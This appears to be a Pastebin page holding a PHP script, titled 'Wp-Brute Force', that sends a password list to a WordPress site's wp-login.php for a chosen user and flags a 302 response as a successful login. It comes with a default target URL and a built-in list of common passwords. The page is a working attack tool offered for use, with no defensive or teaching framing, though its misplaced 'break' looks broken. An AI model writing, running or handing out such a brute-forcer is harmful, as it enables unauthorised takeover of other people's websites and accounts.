Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- error_reporting(0);
- class Wp{
- private $host;
- private $user;
- private $open;
- private $lista;
- public function banner() {
- echo("
- <html>
- <head>
- <title>Wp-Brute Force</title>
- </head>
- <body>
- <h2>Wordpress Brute Force</h2>
- <form action='' method='POST'>
- Host:<input type='text' name='host' value='http://target.co.li/'><br>
- User:<input type='text' name='user' value='admin'><br>
- <center><textarea class='area' name='lista'>admin123456
- master!@#$qwe
- sumedang123
- 1qaz2wsx
- b1smillah
- house69
- b1smillah
- Suk4bum1
- kasitaugakya
- vro190588
- agoes
- admin123
- meong
- 773062
- #admin#
- admin!@#
- @dm1n
- ADMIN
- bs1unt46
- Administrator
- ADMINISTRATOR
- !@#123!@#123
- ngadimin
- default
- pass
- sukmapts
- password</textarea><br><br><center>
- <center><input type='Submit' value='Start' style='width: 200px;'></center>
- </form>
- </body>
- </html>");
- }
- public function extract_post() {
- $this->host = $_POST["host"];
- $this->user = $_POST["user"];
- $this->open = $_POST["lista"];
- }
- public function Xregex() {
- if(preg_match("@/wp-login.php@", $this->host)) {
- return true;
- } else {
- $this->host = $_POST["host"]."/wp-login.php";
- }
- }
- public function brute() {
- $lista = array_filter(explode("\n", $this->open));
- foreach($lista as $this->lista) {
- for($i=0; $i < count($this->lista); $i++) {
- $this->Xcurl();
- }
- }
- }
- private function cool() {
- echo "Host:"."<font color='white'>{$this->host}</font>";
- echo " User:"."<font color='white'>{$this->user}</font>";
- echo " Pass:"."<font color='white'>{$this->lista}</font>";
- }
- private function Xcurl() {
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $this->host);
- curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($curl, CURLOPT_POST, true);
- curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
- $exec = curl_exec($curl);
- $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
- $this->cool();
- if($http == 302) {
- echo "<font color='#00FF00'> [+] Successfull!!</font><br>";
- break;
- } else {
- echo "<font color='red'>Failed</font><br>";
- }
- curl_close($curl);
- }
- }
- $wp = new Wp();
- $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
- $wp->banner();
- $wp->extract_post();
- $wp->Xregex();
- $wp->brute();
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement